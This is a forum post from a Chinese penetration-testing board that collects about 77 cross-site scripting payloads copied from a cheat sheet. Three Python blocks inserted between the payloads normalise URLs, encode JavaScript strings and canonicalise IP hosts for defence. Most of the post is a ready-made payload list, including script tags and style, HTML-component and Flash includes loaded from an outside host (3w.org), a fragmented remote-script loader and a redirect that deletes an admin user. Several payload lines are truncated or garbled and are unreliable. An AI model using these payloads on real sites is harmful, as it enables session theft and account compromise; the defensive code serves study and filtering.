中国网络渗透测试联盟

Title: XSS cross-site scripting attack roundup

Author: admin    Time: 2012-9-5 14:56
Title: XSS cross-site scripting attack roundup
It seems t00ls has rather little material on XSS; I saw this good stuff and copied it over, not sure whether any of you need to bookmark it.
(1) Normal XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript with embedded characters; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null bytes are basically ineffective in China, since there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters in the IMG tag before the JavaScript
<IMG SRC="   javascript:alert('XSS');">

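The IMG SRC variants in items (3) to (19) all depend on the browser accepting a javascript: URL only after lenient decoding: case folding, numeric character references with or without semicolons, embedded tabs, newlines and NUL bytes, and leading whitespace. A server-side filter that compares the raw attribute value against the literal string "javascript:" misses every one of them. The Python below is an added defensive example, not code from the original post or from the cheat sheet it copies: it normalises a URL attribute the way a browser's URL parser would before checking the scheme against an allow-list, and runs that check over every URL-bearing attribute of an HTML fragment. The attribute set, the characters stripped and the sample inputs are this example's own assumptions; the samples are constructed.

```python
import re
from html.parser import HTMLParser

# Attributes whose value the browser treats as a URL (assumption: the set
# that matters for the IMG/BODY/TABLE/INPUT vectors in this list).
URL_ATTRIBUTES = {"src", "href", "background", "lowsrc", "dynsrc", "action", "formaction"}
SAFE_SCHEMES = {"http", "https"}

# The URL standard removes ASCII tab, LF and CR anywhere in the input and
# trims leading/trailing C0 controls and spaces; NUL is dropped as well
# because some older browsers ignored it (item 17).
_REMOVED_ANYWHERE = {"\t", "\n", "\r", "\x00"}
_TRIM_CHARS = "".join(chr(c) for c in range(0x21))
_NUMERIC_REF = re.compile(r"&#([xX][0-9A-Fa-f]+|[0-9]+);?")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def decode_numeric_entities(value):
    """Decode &#NNN / &#xHH references with or without the trailing
    semicolon, as lenient HTML parsers do (items 5, 9 and 10)."""
    def replace(match):
        ref = match.group(1)
        codepoint = int(ref[1:], 16) if ref[0] in "xX" else int(ref, 10)
        if codepoint == 0 or codepoint > 0x10FFFF:
            return "\ufffd"
        return chr(codepoint)
    return _NUMERIC_REF.sub(replace, value)


def normalize_url_attribute(value):
    """Reduce an attribute value to the text the browser hands to its URL
    parser: decode references, drop embedded tab/CR/LF/NUL (items 11-14,
    17), trim leading and trailing whitespace and controls (item 19)."""
    decoded = decode_numeric_entities(value)
    decoded = "".join(ch for ch in decoded if ch not in _REMOVED_ANYWHERE)
    return decoded.strip(_TRIM_CHARS)


def url_scheme(value):
    """Lower-cased scheme the browser would see, or None for a relative URL."""
    match = _SCHEME.match(normalize_url_attribute(value))
    return match.group(1).lower() if match else None


def is_safe_url_attribute(value):
    """Allow-list: relative URLs and http(s) only. javascript:, vbscript:,
    data: and anything unexpected are rejected rather than enumerated."""
    scheme = url_scheme(value)
    return scheme is None or scheme in SAFE_SCHEMES


class _UnsafeUrlFinder(HTMLParser):
    """Collects (tag, attribute, scheme) for every URL attribute that fails."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRIBUTES and value and not is_safe_url_attribute(value):
                self.findings.append((tag, name, url_scheme(value)))


def find_unsafe_urls(fragment):
    """Scan an HTML fragment and return the findings. HTMLParser has already
    decoded references in attribute values, so a double-encoded value is
    decoded twice here and over-reported, the safe direction for a detector."""
    finder = _UnsafeUrlFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    # Constructed sample: the scheme is hidden behind mixed case, a leading
    # space and an embedded tab, combining items (4), (11) and (19).
    sample = ('<IMG SRC="http://3w.org/XSS/a.png">'
              '<IMG LOWSRC="  JaVa\tScRiPt:alert(\'XSS\')">'
              '<A HREF="//3w.org/">XSS</A>')
    for finding in find_unsafe_urls(sample):
        print("unsafe URL attribute:", finding)
```

The check is an allow-list on the scheme rather than a block-list of javascript:/vbscript:, so the encodings in items (5) to (10) and any scheme this list does not mention fail the same way. A protocol-relative URL has no scheme and passes here; whether its host is acceptable is a separate question.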
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

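Items (28) and (29) concern the JavaScript-string context: a user value placed inside a quoted literal in a script block. A filter that only puts a backslash in front of quote characters is defeated by \";alert('XSS');// because the attacker's own backslash cancels the one the filter inserts, and the literal ends early. The Python below is an added example, not code from the original post: it contrasts that naive filter with encoding the value as a complete JavaScript string literal (json.dumps plus \u-escapes for <, > and & so the literal can never contain a closing script tag), adds the matching encoder for the quoted HTML attribute context, and includes a small scanner that reports whether the embedded statement is still a single string literal. The function names and the `var name = ...` template are this example's own.

```python
import html
import json

# Statement the value is embedded into; the variable name is arbitrary.
_TEMPLATE = "var name = %s;"


def naive_quoted_literal(value):
    """The kind of filter item (29) defeats: wrap the value in quotes and
    backslash the quote characters only. A backslash supplied by the
    attacker escapes the backslash inserted here, so the literal closes."""
    return '"' + value.replace('"', '\\"').replace("'", "\\'") + '"'


def js_string_literal(value):
    """Encode arbitrary text as a complete JavaScript string literal that is
    safe inside a script block. json.dumps escapes quotes, backslashes and
    control characters; <, > and & are \\u-escaped so the output can never
    contain </script> or an HTML comment opener; U+2028/U+2029 are escaped
    because older engines treat them as line terminators."""
    encoded = json.dumps(value)
    for raw, escaped in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                         ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        encoded = encoded.replace(raw, escaped)
    return encoded


def html_attribute_value(value):
    """Encoding for the other context this list attacks, a quoted HTML
    attribute (items 6 and 19): entity-encode quotes, &, < and >."""
    return html.escape(value, quote=True)


def embed(value, encoder):
    """Build the statement exactly as a template engine would emit it."""
    return _TEMPLATE % encoder(value)


def is_single_string_literal(statement):
    """Tiny scanner: True only if the statement is the template with exactly
    one double-quoted literal, i.e. nothing escaped out of the string."""
    prefix = _TEMPLATE.split("%s")[0] + '"'
    if not statement.startswith(prefix):
        return False
    i = len(prefix)
    while i < len(statement):
        ch = statement[i]
        if ch == "\\":
            i += 2          # escape sequence: skip the escaped character
            continue
        if ch == '"':
            return statement[i + 1:] == ";"
        i += 1
    return False


if __name__ == "__main__":
    # Constructed input: the payload of item (29).
    payload = '\\";alert(\'XSS\');//'
    for encoder in (naive_quoted_literal, js_string_literal):
        statement = embed(payload, encoder)
        print(encoder.__name__, "->", statement,
              "| intact:", is_single_string_literal(statement))
```

The point of the scanner is that it makes the defect visible without executing anything: with the naive encoder the statement stops being one string literal, with the JSON-based encoder it stays one. Encoding has to be chosen per output context; the attribute encoder is useless inside a script block and the script encoder is useless inside an attribute.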
(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image to use it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
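Items (68) to (77) show how one link target can be spelled many ways: a single decimal number, hex or octal dotted components, a mixed form with tabs and newlines inside the scheme and host, a protocol-relative URL, a DNS name with a trailing dot, or a javascript: URL that is not a network location at all. A link allow-list that compares raw strings accepts or rejects the wrong ones. The Python below is an added example, not code from the original post: it canonicalises the host the way the WHATWG URL IPv4 parser does (hex, octal and decimal components, with the last component filling the remaining bytes), strips the characters browsers ignore, and only then compares the host against an allow-list, after rejecting non-http schemes. The helper names and the sample URLs, including a tab/newline spelling of item (73), are constructed for this example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Component syntaxes accepted by the URL standard's IPv4 parser (items 70-73).
_HEX = re.compile(r"0[xX][0-9A-Fa-f]*")
_OCT = re.compile(r"0[0-7]+")
_DEC = re.compile(r"[0-9]+")
ALLOWED_SCHEMES = {"http", "https"}


def parse_ipv4_component(part):
    """One dotted component: 0x.. is hex, a leading 0 means octal, else decimal."""
    if _HEX.fullmatch(part):
        return int(part[2:] or "0", 16)
    if _OCT.fullmatch(part):
        return int(part, 8)
    if _DEC.fullmatch(part):
        return int(part, 10)
    return None


def decode_numeric_ipv4(host):
    """Canonical dotted quad for a host written as a single number or as
    one to four hex/octal/decimal components; None if it is not a numeric
    IPv4. The last component fills all remaining bytes, per the URL standard."""
    parts = host.split(".")
    if len(parts) > 4:
        return None
    values = [parse_ipv4_component(p) for p in parts]
    if any(v is None for v in values):
        return None
    *head, last = values
    if any(v > 255 for v in head) or last >= 256 ** (4 - len(head)):
        return None
    number = last
    for i, v in enumerate(head):
        number += v << (8 * (3 - i))
    return str(ipaddress.IPv4Address(number))


def split_link(url):
    """(scheme, canonical host) for a link target: embedded tab/CR/LF are
    removed as browsers do (item 73), a protocol-relative URL gets http
    (item 74), the trailing dot of an absolute DNS name is dropped (item 76)
    and numeric IPv4 spellings are rewritten to dotted-quad form (70-72)."""
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n")
    if cleaned.startswith("//"):
        cleaned = "http:" + cleaned
    parts = urlsplit(cleaned)
    host = (parts.hostname or "").rstrip(".")
    return parts.scheme.lower(), (decode_numeric_ipv4(host) or host)


def is_allowed_link(url, allowed_hosts):
    """Allow-list by scheme and canonical host. javascript: and other
    non-http schemes (item 77) fail the scheme test before any host check."""
    scheme, host = split_link(url)
    return scheme in ALLOWED_SCHEMES and host in allowed_hosts


if __name__ == "__main__":
    # Constructed samples, spelled the way items (70) to (76) spell them.
    for link in ("http://3232235521/", "http://0xc0.0xa8.0x00.0x01/",
                 "http://0300.0250.0000.0001/", "h\ntt\tp://6\t6.000146.0x7.147/",
                 "//www.google.com/", "http://www.google.com./"):
        print(repr(link), "->", split_link(link))
```

Comparing canonical hosts is what makes items (70), (71) and (72) collapse into the same 192.168.0.1, and item (76) into the same name as its dotless form; the same normalisation is what a fetcher needs before deciding whether a target is internal.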
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2